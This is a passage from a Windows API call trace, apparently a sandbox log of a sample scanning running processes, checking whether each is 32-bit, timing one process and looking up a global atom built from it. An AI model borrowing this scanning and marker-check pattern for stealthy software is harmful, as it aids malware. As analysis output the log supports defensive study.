	[0093.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0093.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.673] CloseHandle (hObject=0x248) returned 1
	[0093.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0093.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.673] CloseHandle (hObject=0x248) returned 1
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0093.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.674] CloseHandle (hObject=0x248) returned 1
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0093.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.674] CloseHandle (hObject=0x248) returned 1
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0093.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.674] CloseHandle (hObject=0x248) returned 1
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0093.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.674] CloseHandle (hObject=0x248) returned 1
	[0093.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0093.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.674] CloseHandle (hObject=0x248) returned 1
	[0093.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0093.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.675] CloseHandle (hObject=0x248) returned 1
	[0093.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0093.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.675] CloseHandle (hObject=0x248) returned 1
	[0093.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0093.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.675] CloseHandle (hObject=0x248) returned 1
	[0093.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0093.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.675] CloseHandle (hObject=0x248) returned 1
	[0093.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0093.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.675] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.676] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.676] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.676] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.676] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.676] CloseHandle (hObject=0x248) returned 1
	[0093.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0093.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0093.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0093.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0093.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0093.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0093.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.677] CloseHandle (hObject=0x248) returned 1
	[0093.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0093.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.678] CloseHandle (hObject=0x248) returned 1
	[0093.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0093.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.678] CloseHandle (hObject=0x248) returned 1
	[0093.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.678] CloseHandle (hObject=0x248) returned 1
	[0093.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.678] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.679] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.679] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.679] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.679] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.679] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.679] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.679] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.679] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.679] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0093.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.680] CloseHandle (hObject=0x248) returned 1
	[0093.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0093.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.680] CloseHandle (hObject=0x248) returned 1
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0093.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.758] CloseHandle (hObject=0x248) returned 1
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0093.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.758] CloseHandle (hObject=0x248) returned 1
	[0093.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0093.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.759] CloseHandle (hObject=0x248) returned 1
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0093.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.759] CloseHandle (hObject=0x248) returned 1
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0093.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.759] CloseHandle (hObject=0x248) returned 1
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0093.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.759] CloseHandle (hObject=0x248) returned 1
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0093.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.759] CloseHandle (hObject=0x248) returned 1
	[0093.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0093.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.760] CloseHandle (hObject=0x248) returned 1
	[0093.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0093.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.760] CloseHandle (hObject=0x248) returned 1
	[0093.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0093.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.760] CloseHandle (hObject=0x248) returned 1
	[0093.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0093.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.760] CloseHandle (hObject=0x248) returned 1
	[0093.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0093.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.760] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0093.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.761] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0093.762] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.762] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0093.762] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.762] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0093.762] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.762] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0093.762] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.762] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0093.762] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.762] CloseHandle (hObject=0x248) returned 1
	[0093.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0093.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.763] CloseHandle (hObject=0x248) returned 1
	[0093.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0093.764] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.764] CloseHandle (hObject=0x248) returned 1
	[0093.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.764] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.764] CloseHandle (hObject=0x248) returned 1
	[0093.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.764] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.764] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.765] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.765] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.765] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.765] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.765] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.765] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.765] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0093.766] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.766] CloseHandle (hObject=0x248) returned 1
	[0093.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0093.766] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.766] CloseHandle (hObject=0x248) returned 1
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0093.837] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.837] CloseHandle (hObject=0x248) returned 1
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0093.837] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.837] CloseHandle (hObject=0x248) returned 1
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0093.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.838] CloseHandle (hObject=0x248) returned 1
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0093.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.838] CloseHandle (hObject=0x248) returned 1
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0093.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.838] CloseHandle (hObject=0x248) returned 1
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0093.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.838] CloseHandle (hObject=0x248) returned 1
	[0093.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0093.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.839] CloseHandle (hObject=0x248) returned 1
	[0093.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0093.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.839] CloseHandle (hObject=0x248) returned 1
	[0093.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0093.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.839] CloseHandle (hObject=0x248) returned 1
	[0093.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0093.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.839] CloseHandle (hObject=0x248) returned 1
	[0093.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0093.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.839] CloseHandle (hObject=0x248) returned 1
	[0093.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0093.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.840] CloseHandle (hObject=0x248) returned 1
	[0093.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0093.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.840] CloseHandle (hObject=0x248) returned 1
	[0093.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
